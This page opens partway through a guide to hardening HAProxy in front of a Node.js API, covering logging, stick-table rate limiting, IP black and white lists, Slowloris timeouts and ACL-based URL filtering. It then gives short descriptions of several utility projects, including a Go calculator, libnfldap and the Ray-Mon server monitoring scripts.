                +------v-------+       +-----+--------+
                |backend       |+----->|frontend      |
                |     logger   |       |   logger     |
                +--------------+       +--------------+

At the end of the configuration of frontend fxa-https, instead of sending requests to backend fxa-nodejs, we send them to backend logger.

frontend fxa-https
        # Don't log here, log into logger frontend
        no log
        default_backend logger

Then we declare a backend and a frontend for logger:

backend logger
        server localhost localhost:55555 send-proxy

# frontend use to log acl activity
frontend logger
        bind localhost:55555 accept-proxy


        capture request header Referrer len 64
        capture request header Content-Length len 10
        capture request header User-Agent len 64
        capture request header X-Haproxy-ACL len 256
        capture request header X-Unique-ID len 64

        # if previous ACL didn't pass and aren't whitelisted
        acl whitelisted req.fhdr(X-Haproxy-ACL) -m beg whitelisted,
        acl fail-validation req.fhdr(X-Haproxy-ACL) -m found
        http-request deny if !whitelisted fail-validation

        default_backend fxa-nodejs

Note the use of send-proxy and accept-proxy between the logger backend and frontend, which preserves the client IP information across the internal hop.

Isn’t this slow and inefficient?

Well, obviously, routing requests through HAProxy twice isn't the most elegant way of proxying. But in practice, this approach adds minimal overhead. Linux and HAProxy support TCP splicing, which provides zero-copy transfer of data between TCP sockets. When HAProxy forwards the request to the logger socket, there is, in fact, no transfer of data at the kernel level. Benchmark it, it's fast!

6   Rate limiting & DDoS protection

One particularity of operating an infrastructure in AWS is that control over the network is very limited. Techniques such as BGP blackholing are not available, and visibility over layers 3 (IP) and 4 (TCP) is reduced. Building protection against DDoS means that we need to block traffic further down the stack, which consumes more resources. This is the main motivation for using ELBs in TCP mode with the PROXY protocol: it gives HAProxy low-level access to the TCP connection, and visibility of the client IP before parsing HTTP headers (as you would traditionally do with X-Forwarded-For).

ELBs have limited resources, but simplify the management of public IPs in AWS. By offloading the SSL & HTTP processing to HAProxy, we reduce the pressure on ELB, while conserving the ability to manage the public endpoints through it.

HAProxy maintains tons of detailed information on connections. One can use this information to accept, block or route connections. In the following section, we will discuss the use of ACLs and stick-tables to block clients that do not respect sane limits.

6.1   Automated rate limiting

The configuration below enables counters to track connections in a table where the key is the source IP of the client:

# Define a table that will store IPs associated with counters
stick-table type ip size 500k expire 30s store conn_cur,conn_rate(10s),http_req_rate(10s),http_err_rate(10s)

# Enable tracking of src IP in the stick-table
tcp-request content track-sc0 src

Let’s decompose this configuration. First, we define a stick-table that stores IP addresses as keys. We define a maximum size for this table of 500,000 IPs, and we tell HAProxy to expire the records after 30 seconds. If the table gets filled, HAProxy will delete records following the LRU logic.

The stick-table will store a number of information associated with the IP address:

  • conn_cur is a counter of the concurrent connection count for this IP
  • conn_rate(10s) is a sliding window that counts new TCP connections over a 10-second period
  • http_req_rate(10s) is a sliding window that counts HTTP requests over a 10-second period
  • http_err_rate(10s) is a sliding window that counts HTTP errors triggered by requests from that IP over a 10-second period

By default, the stick-table declaration doesn't do anything on its own; we need to send data to it. This is what the tcp-request content track-sc0 src directive does.

Now that we have tracking in place, we can write ACLs that run tests against the content of the table. The examples below evaluate several of these counters against arbitrary limits. Tune these to your needs.

# Flag the new connection if the client already has 100 connections open
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]over-100-active-connections, if { src_conn_cur ge 100 }

# Flag the new connection if the client has opened more than 100 connections in 10 seconds
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]over-100-connections-in-10-seconds, if { src_conn_rate ge 100 }

# Flag the connection if the client has passed the HTTP error rate limit
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]high-error-rate, if { sc0_http_err_rate() gt 100 }

# Flag the connection if the client has passed the HTTP request rate limit
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]high-request-rate, if { sc0_http_req_rate() gt 500 }
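If you prefer to reject offenders outright rather than mark their requests with a header, the same conditions can be wired to reject/deny actions. A sketch, using the same counters and limits:

# Hard-blocking variants of the same limits (sketch)
tcp-request connection reject if { src_conn_cur ge 100 }
tcp-request connection reject if { src_conn_rate ge 100 }
http-request deny if { sc0_http_err_rate() gt 100 }
http-request deny if { sc0_http_req_rate() gt 500 }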

HAProxy provides a lot of flexibility on what can be tracked in a stick-table. Take a look at section 7.3.2. Fetching samples at Layer 4 from the doc to get a better idea.

6.2   Querying tables state in real time

Tables are named after the name of the frontend or backend they live in. Our frontend called fxa-https will have a table called fxa-https, that can be queried through the stat socket:

# echo "show table fxa-https" | socat unix:/var/lib/haproxy/stats -
# table: fxa-https, type: ip, size:512000, used:1
0x1aa3358: key= use=1 exp=29957 conn_rate(10000)=43 conn_cur=1 http_req_rate(10000)=42 http_err_rate(10000)=42

The line above shows a table entry for key, which is a tracked IP address. The other entries on the line show the status of various counters that we defined in the configuration.

6.3   Blacklists & Whitelists

Blacklists and whitelists are simple lists of IP addresses that are checked by HAProxy as early as possible. Blacklists are checked at the beginning of the TCP connection, which allows for early connection drops, and also means that blacklisting an IP always takes precedence over any other rule, including the whitelist.

Whitelists are checked at the HTTP level, and allow trusted clients to bypass ACLs and rate limiting.

# Blacklist: Deny access to some IPs before anything else is checked
tcp-request content reject if { src -f /etc/haproxy/blacklist.lst }

# Whitelist: Allow IPs to bypass the filters
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]whitelisted, if { src -f /etc/haproxy/whitelist.lst }
http-request allow if { src -f /etc/haproxy/whitelist.lst }

List files can contain IP addresses or networks in CIDR format.
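As an illustration, a list file mixes single addresses and CIDR networks, one entry per line (the addresses below are examples from documentation ranges):

# /etc/haproxy/blacklist.lst (example entries)
192.0.2.11
198.51.100.0/24
203.0.113.0/25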

List files are loaded into HAProxy at startup. If you add or remove IPs from a list, make sure to perform a soft reload.

haproxy -f /etc/haproxy/haproxy.cfg -c && sudo haproxy -f /etc/haproxy/haproxy.cfg -sf $(pidof haproxy)

6.4   Protect against slow clients (Slowloris attack)

Slowloris is an attack where a client sends its requests to the server very slowly, forcing the server to keep resources allocated for that client while they go mostly unused. This attack is commonly used in DDoS, by clients that send their requests character by character. HAProxy can block these clients by enforcing a maximum amount of time a client can take to send a full request. This is done with the timeout http-request parameter.

# disconnect slow handshake clients early, protect from
# resources exhaustion attacks
timeout http-request 5s

7   URL filtering with ACLs

HAProxy has the ability to inspect requests before passing them to the backend. This is limited to query strings, and doesn’t support inspecting the body of a POST request. But we can already leverage this to filter out unwanted traffic.

The first thing we need is a list of endpoints sorted by HTTP method. This can be obtained from the web application directly. Note that some endpoints, such as heartbeat, should be restricted to HAProxy, and thus blocked from clients.

For now, let’s ignore GET URL parameters, and only build a list of request paths, that we store in two files: one for GET requests, and one for POST requests.



In the HAProxy configuration, we can build ACLs around these files. The http-request deny directive takes a condition, as described in the HAProxy documentation, section 7.2. Using ACLs to form conditions.

# Requests validation using ACLs ---
acl valid-get path -f /etc/haproxy/get_endpoints.lst
acl valid-post path -f /etc/haproxy/post_endpoints.lst

# block requests that don't match the predefined endpoints
http-request deny unless METH_GET valid-get or METH_POST valid-post

http-request deny does the job, and returns a 403 to the client. But if you want more visibility on ACL activity, you may want to use a custom header as described later in this section.

7.1   Filtering URL parameters on GET requests

While HAProxy supports regexes on URLs, writing regexes that can validate URL parameters is a path that leads to frustration and insanity. A much simpler approach consists of using the url_param ACL provided by HAProxy.

For example, take the NodeJS endpoint below:

{
  method: 'GET',
  path: '/verify_email',
  config: {
    validate: {
      query: {
        code: isA.string().max(32).regex(HEX_STRING).required(),
        uid: isA.string().max(32).regex(HEX_STRING).required(),
        service: isA.string().max(16).alphanum().optional(),
        redirectTo: isA.string()
      }
    }
  },
  handler: function (request, reply) {
    return reply().redirect(config.contentServer.url + request.raw.req.url)
  }
}

This endpoint receives requests on /verify_email with the parameters code, a 32 character hexadecimal, uid, a 32 character hexadecimal, service, a 16 character string, and redirectTo, a FQDN. However, only code and uid are required.

In the previous section, we validated that requests on /verify_email must use the method GET. Now we are taking the validation one step further, and blocking requests on this endpoint that do not match our prerequisite.

acl endpoint-verify_email path /verify_email
acl param-code urlp_reg(code) [0-9a-fA-F]{1,32}
acl param-uid urlp_reg(uid) [0-9a-fA-F]{1,32}
http-request deny if endpoint-verify_email !param-code or endpoint-verify_email !param-uid

The following request will be accepted; everything else will be rejected with an HTTP 403 error.


Using regexes to validate URL parameters is a powerful feature. Below is another example that matches an email address using a case-insensitive regex:

acl endpoint-complete_reset_password path /complete_reset_password
acl param-email urlp_reg(email) -i ^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$
acl param-token urlp_reg(token) [0-9a-fA-F]{1,64}
http-request deny if endpoint-complete_reset_password !param-email or endpoint-complete_reset_password !param-token or endpoint-complete_reset_password !param-code

Note that we didn't redefine param-code when we reused it in the http-request deny command. This is because ACLs are defined globally for a frontend, and can be reused multiple times.
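These regexes can be exercised outside HAProxy before deploying them. The sketch below uses grep -E with the hex pattern from above; note that, unanchored, a pattern like [0-9a-fA-F]{1,32} also matches any string that merely contains a hex character, so anchors are added here to force a full-string match:

```shell
# Validate sample values against the hex pattern used by urlp_reg.
# Anchors (^...$) force a full-string match for the standalone test.
re='^[0-9a-fA-F]{1,32}$'
echo 'deadbeef0123' | grep -Eq "$re" && echo 'valid'
echo 'not-hex!'     | grep -Eq "$re" || echo 'invalid'
# prints: valid
# prints: invalid
```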

7.2   Filtering payloads on POST requests

POST requests are harder to validate, not only because they do not follow a predefined format, but also because the client could send the body over a long period of time, split across dozens of packets.

However, in the case of an API that only handles small POST payloads, we can at least verify the size of the payload sent by the client, and make sure that clients do not overload the backend with random data. This can be done using an ACL on the content-length header of the request. The ACL below discards requests that have a content-length larger than 5 kilobytes (which is already a lot of text).

# match content-length larger than 5kB
acl request-too-big hdr_val(content-length) gt 5000
http-request deny if METH_POST request-too-big

7.3   Marking instead of blocking

Blocking requests may be the preferred behavior in production, but only after a grace period that allows you to build a traffic profile and fine-tune your configuration. Instead of using http-request deny statements in the ACLs, we can insert a header with a description of the blocking decision. This header will be logged, and can be analyzed to verify that no legitimate traffic would be blocked.

As discussed in Logging in a separate frontend, HAProxy is unable to log request headers that it has set itself. So make sure to log in a separate frontend if you use this technique.

The configuration below uses a custom header X-Haproxy-ACL. If an ACL matches, the header is set to the name of the ACL that matched. If several ACLs match, each ACL name is appended to the header, and separated by a comma.

At the end of the ACL evaluation, if this header is present in the request, we know that the request should be blocked.

In the fxa-https frontend, we replace the http-request deny statements with the following logic:

# ~~~ Requests validation using ACLs ~~~
# block requests that don't match the predefined endpoints
acl valid-get path -f /etc/haproxy/get_endpoints.lst
acl valid-post path -f /etc/haproxy/post_endpoints.lst
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]invalid-endpoint, unless METH_GET valid-get or METH_POST valid-post

# block requests on verify_email that do not have the correct params
acl endpoint-verify_email path /v1/verify_email
acl param-code urlp_reg(code) [0-9a-fA-F]{1,32}
acl param-uid urlp_reg(uid) [0-9a-fA-F]{1,32}
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]invalid-parameters, if endpoint-verify_email !param-code or endpoint-verify_email !param-uid

# block requests on complete_reset_password that do not have the correct params
acl endpoint-complete_reset_password path /v1/complete_reset_password
acl param-email urlp_reg(email) -i ^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$
acl param-token urlp_reg(token) [0-9a-fA-F]{1,64}
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]invalid-parameters, if endpoint-complete_reset_password !param-email or endpoint-complete_reset_password !param-token or endpoint-complete_reset_password !param-code

# block content-length larger than 5kB
acl request-too-big hdr_val(content-length) gt 5000
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]request-too-big, if METH_POST request-too-big

Note the %[req.fhdr(X-Haproxy-ACL,-1)] parameter, which retrieves the value of the latest occurrence of the X-Haproxy-ACL header, so we can append to it and store it again. This will create multiple headers if more than one ACL is matched, but that's OK because:

  • we can delete them before sending the request to the backend, using reqdel
  • the logging directive capture request header will only log the last occurrence

X-Haproxy-ACL: over-100-active-connections,
X-Haproxy-ACL: over-100-active-connections,over-100-connections-in-10-seconds,
X-Haproxy-ACL: over-100-active-connections,over-100-connections-in-10-seconds,high-error-rate,
X-Haproxy-ACL: over-100-active-connections,over-100-connections-in-10-seconds,high-error-rate,high-request-rate,
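As mentioned, the accumulated markers can be deleted before the request reaches the backend. A sketch using reqdel (HAProxy 1.5 syntax; place it where the request is finally forwarded to NodeJS):

# Drop the internal ACL markers so they are never
# forwarded to the NodeJS backend
reqdel ^X-Haproxy-ACL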

Then, in the logger frontend, we check the value of the header, and block if needed.

# frontend use to log acl activity
frontend logger
        # if previous ACL didn't pass, and IP isn't whitelisted, block the request
        acl whitelisted req.fhdr(X-Haproxy-ACL) -m beg whitelisted,
        acl fail-validation req.fhdr(X-Haproxy-ACL) -m found
        http-request deny if !whitelisted fail-validation

8   HAProxy management

8.1   Enabling the stat socket

8.2   Collecting statistics

8.3   Analyzing errors

8.4   Parsing performance metrics from the logs

8.5   Soft reload

HAProxy supports soft configuration reload, that doesn’t drop connections. To perform a soft reload, call haproxy with the following command:

$ sudo /opt/haproxy -f /etc/haproxy/haproxy.cfg -sf $(pidof haproxy)

The old process will be replaced with a new one, that uses a fresh configuration. The logs will show the reload:

Mar  6 12:59:41 localhost haproxy[7603]: Proxy https started.
Mar  6 12:59:41 localhost haproxy[7603]: Proxy app started.
Mar  6 12:59:41 localhost haproxy[5763]: Stopping frontend https in 0 ms.
Mar  6 12:59:41 localhost haproxy[5763]: Stopping backend app in 0 ms.
Mar  6 12:59:41 localhost haproxy[5763]: Proxy https stopped (FE: 29476 conns, BE: 0 conns).
Mar  6 12:59:41 localhost haproxy[5763]: Proxy app stopped (FE: 0 conns, BE: 1746 conns).

9   Full HAProxy configuration

10   Building process

10.1   Static build

The script builds haproxy with statically linked OpenSSL and PCRE support.

10.2   Dynamic build

The script does the same as above, but links to PCRE and OpenSSL dynamically.

10.3   RPM build

Using the spec file haproxy.spec and the accompanying bash scripts, we can build an RPM package for the latest development version of HAProxy.


More information can be found on:

Random scripts accumulated over years of sysadminesque linuxeries


A collection of random scripts and tools that I accumulated over the years.

These aren’t supported, and are catered for my own personal needs.

Find them on:

Calc – A simple, fast command-line calculator written in Go


GoDoc Build Status

A simple, fast, and intuitive command-line calculator written in Go.


Install calc as you would any other Go program:

go get


You can use calc in two ways: shell mode and command.

Shell mode

This is probably the mode you'll want to use. It's like the python shell or irb. The shell mode uses the terminal package, which means it supports many of the shell features you know and love (like history, pasting, and the exit command).

> 1+1
> 3(5/(3-4))
> 3pi^2
> @+1
> @@@*2
> ln(-1)


You can also use calc to evaluate an expression with just a single command (i.e. without opening the shell). To do this, just use calc [expression]:

bash$ calc 1+1

Supported functions, operators, and constants

calc supports all the standard stuff, and I’m definitely adding more later (also feel free to fork and add your own!)


+, -, *, /, ^, %


sin, cos, tan, cot, sec, csc, asin, acos, atan, acot, asec, acsc, sqrt, log, lg, ln, abs


e, pi, π


Previous results can be accessed with the @ symbol. A single @ returns the result of the last computation, while multiple @ gets the nth last result, where n is the number of @s used (for example, @@ returns the second-last result, @@@@@ returns the fifth-last result).

Why not use …?

  • Google
    • Doesn’t work without an internet connection
    • Slower
    • Doesn’t show previous computations, so you end up with multiple tabs open at once.
  • Spotlight (on OS X)
    • No history
    • Switching between Spotlight and other windows isn’t too fun
  • Python/IRB
    • Requires use of a separate math module for most functions and constants
    • A little bit slower to start up
  • bc
    • Limited number of built-in functions; these have shortened (not too intuitive) names as well.

The alternatives above are all great, and have their own advantages over calc. I highly recommend looking into these if you don’t like how calc works.

More information can be found on:

Service – Run go programs as a service on major platforms

service (BETA)

service will install / un-install, start / stop, and run a program as a service (daemon). Currently supports Windows XP+, Linux/(systemd | Upstart | SysV), and OSX/Launchd.

Windows controls services by setting up callbacks, which is non-trivial. This is very different from other systems. This package provides the same API despite the substantial differences. It can also be used to detect how a program is called, from an interactive terminal or from a service manager.


  • OS X when running as a UserService Interactive will not be accurate.
  • Determine if UserService should remain in main configuration.
  • Hook up Dependencies field for Linux systems and Launchd.

More Information Can Be Found On:

libnfldap – A Python module to generate IPTables and IPSet rules from LDAP records


A Python module to generate IPTables and IPSet rules from LDAP records. See for a demo.


Use PyPi:

$ sudo pip install libnfldap

Or build a RPM using:

$ python bdist_rpm

The latter will require python-ldap to be installed separately, either using yum install python-ldap or pip install ldap. It's up to you, the RPM will not attempt to install the ldap dependency.


The script at will build iptables and ipset rules for all users in LDAP. You can provide the script an ldap filter as argv[1] to limit the scope.

$ time python '(uid=jvehent)'
IPTables rules written in /tmp/tmpT7JgOW
IPSet rules written in /tmp/tmpJYtWM5

real    0m0.605s
user    0m0.061s
sys     0m0.014s

A second example script does something similar, but for a single user identified by uidNumber (unix user ID).

$ python 2297
#Generating rules for user ID 1664
#====== ACL details ======
jvehent has access to .....


Julien Vehent & Guillaume Destuynder (@ mozilla)

More information can be found on:

Ray-Mon – PHP and Bash server status monitoring

Ray-Mon is a Linux server monitoring script written in PHP and Bash, using JSON as data storage. It requires only bash and a webserver on the client side, and only PHP on the server side. The client currently supports monitoring processes, uptime, updates, logged-in users, disk usage, RAM usage and network traffic.


  • Ping monitor
  • History per host
  • Threshold per monitored item.
  • Monitors:
    • Processes (lighttpd, apache, nginx, sshd, munin etc.)
    • RAM
    • Disk
    • Uptime
    • Users logged on
    • Updates
    • Network (RX/TX)


Either git clone the github repo:

git clone git://

Or download the zipfile from github:

Or download the zipfile from

This is the github page:


  • Server side now only requires 1 script instead of 2.
  • Client script generates more robust JSON: if a value is missing, the JSON file no longer breaks.
  • Changed the visual style to a better layout.
  • Thresholds implemented and configurable.
  • History per host now implemented.
  • Initial release



The client is a bash script which outputs JSON. It requires root access and should be run as root. It also requires a webserver, so that the status server can fetch the JSON file.
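The real client script is longer, but its core job can be sketched in a few lines of shell. This is an illustration only, not the actual Ray-Mon client, and the key names are examples:

```shell
#!/bin/sh
# Stripped-down illustration of the client's job: collect a few system
# values and print them as one JSON object. Key names are examples only.
HOST=$(hostname)
UPTIME=$(awk '{print int($1)}' /proc/uptime)            # seconds since boot
DISK=$(df -P / | awk 'NR==2 {gsub(/%/,""); print $5}')  # root fs usage in %
USERS=$(who | wc -l)
JSON=$(printf '{ "hostname" : "%s", "uptime" : "%s", "disk" : "%s", "users" : "%s" }' \
    "$HOST" "$UPTIME" "$DISK" "$USERS")
echo "$JSON"
```

The real script adds the process checks, RAM, updates and network counters described below, but the shape is the same: shell out to standard tools, then assemble one JSON object.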

Software needed for the script:

  • bash
  • awk
  • grep
  • ifconfig
  • package managers supported: apt-get, yum and pacman (debian/ubuntu, centos/RHEL/SL, Arch)

Set up a webserver (lighttpd, apache, boa, thttpd, nginx) to serve the script output. If a webserver is already running on the client, you don't need to install another one.

Edit the script:

Network interfaces: the first one is used for the IP address, the second one for bandwidth calculations. This split exists because OpenVZ has the "venet0" interface for bandwidth and the "venet0:0" interface with the IP. If you run bare metal, KVM, vserver etc., you can set both to the same value (eth0, eth1, etc.).

# Network interface for the IP address
# network interface for traffic monitoring (RX/TX bytes)

The IP address of the server, this is used by me when deploying this script via chef or ansible. You can set it, but it is not required.
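As an aside, those RX/TX counters can also be read directly from the /sys filesystem instead of parsing ifconfig output. A hedged sketch; "lo" is only an example, substitute the traffic interface you configured:

```shell
#!/bin/sh
# Sketch: read interface byte counters from /sys (Linux only).
# "lo" is just an example interface name.
IFACE=lo
RX=$(cat /sys/class/net/$IFACE/statistics/rx_bytes)
TX=$(cat /sys/class/net/$IFACE/statistics/tx_bytes)
printf '"rx" : "%s", "tx" : "%s"\n' "$RX" "$TX"
```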

Services are checked by doing a ps to see if the process is running. The last service must be defined without a trailing comma, to keep the JSON valid. The code below monitors "sshd", "lighttpd", "munin-node" and "syslog".

SERVICE=sshd
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n "\"$SERVICE\" : \"running\","; else echo -n "\"$SERVICE\" : \"not running\","; fi
SERVICE=lighttpd
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n "\"$SERVICE\" : \"running\","; else echo -n "\"$SERVICE\" : \"not running\","; fi
SERVICE=munin-node
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n "\"$SERVICE\" : \"running\","; else echo -n "\"$SERVICE\" : \"not running\","; fi
SERVICE=syslog
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n "\"$SERVICE\" : \"running\""; else echo -n "\"$SERVICE\" : \"not running\""; fi

To add a service, copy the 2 lines and replace the SERVICE=processname with the actual process name:

SERVICE=processname
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n "\"$SERVICE\" : \"running\","; else echo -n "\"$SERVICE\" : \"not running\","; fi

And make sure the last monitored service does not echo a comma at the end, otherwise the JSON is not valid and the PHP script fails.
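If you would rather not maintain that last-line special case by hand, the same checks can be generated in a loop that strips the trailing comma itself. A sketch; the service list is an example:

```shell
#!/bin/sh
# Sketch: build the services fragment in a loop and strip the trailing
# comma once at the end, so every service line can be identical.
SERVICES="sshd lighttpd munin-node syslog"
JSON_OUT=""
for SERVICE in $SERVICES; do
    if ps ax | grep -v grep | grep "$SERVICE" > /dev/null; then
        STATE="running"
    else
        STATE="not running"
    fi
    JSON_OUT="$JSON_OUT\"$SERVICE\" : \"$STATE\", "
done
JSON_OUT=${JSON_OUT%, }    # drop the final ", " to keep the JSON valid
echo "$JSON_OUT"
```

Adding a service then becomes a one-word change to the SERVICES list instead of copying and editing two lines.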

Now setup a cronjob to execute the script on a set interval and save the JSON to the webserver directory.

As root, create the file /etc/cron.d/raymon-client with the following contents:

*/5 * * * * root /root/scripts/ | sed ':a;N;$!ba;s/\n//g' > /var/www/stat.json

In my case, the client script is in /root/scripts and my webserver directory is /var/www; change these to match your own setup. You might also want to change the time interval: */5 executes every 5 minutes. The sed command removes the newlines, which produces a smaller JSON file and saves a few KB. The "root" after the cron schedule is specific to files in /etc/cron.d/: it tells cron which user should execute the crontab entry.

When this is set up you should get a stat.json file in the /var/www/ folder containing the status JSON. If so, the client is set up correctly.
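A quick way to confirm the generated file is actually valid JSON before wiring up the status server. The path and sample content below are illustrative, and this assumes python3 is available:

```shell
#!/bin/sh
# Sanity-check sketch: validate a status file with python3's built-in
# JSON parser. The file written here is a stand-in for real client output.
STAT=/tmp/stat.json
printf '{ "hostname" : "web01", "disk" : "42" }\n' > "$STAT"
if python3 -m json.tool < "$STAT" > /dev/null 2>&1; then
    RESULT="valid"
else
    RESULT="broken"
fi
echo "stat.json is $RESULT"
```

A stray trailing comma from the service checks above is exactly the kind of error this catches early.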


The status server is a PHP script which fetches the JSON files from the clients every 5 minutes, saves them and displays them. It can also save history, which is described below.


  • Webserver with PHP (min. 5.2) and write access to the folder the script is located.


Create a new folder on the webserver and make sure the webserver user (www-data) can write to it.

Place the php file “stat.php” in that folder.

Edit the host list in the php file to include your clients:

The first parameter is the filename the json file is saved to, and the second is the URL where the json file is located.

                '' => '',
                '' => '',
                '' => '',
                '' => ''

Edit the values for the ping monitor:

$pinglist = array(

Edit the threshold values:

# The values below set the threshold before a value is shown in bold on the page.
# Max updates available
$maxupdates = "10";
# Max users concurrently logged in
$maxusers = "3";
# Max load.
$maxload = "2";
# Max disk usage (in percent)
$maxdisk = "75";
# Max RAM usage (in percent)
$maxram = "75";

To save the history you have to setup a cronjob to get the status page with a special “history key”. You define this in the stat.php file:

## Set this to "secure" the history saving. This key has to be given as a parameter to save the history.
$historykey = "8A29691737D";    

And then the cronjob to get it:

## This saves the history every 8 hours. 
30 */8 * * * wget -qO /dev/null

The cronjob can be on any server which can access the status page, but preferably on the host where the status page is located.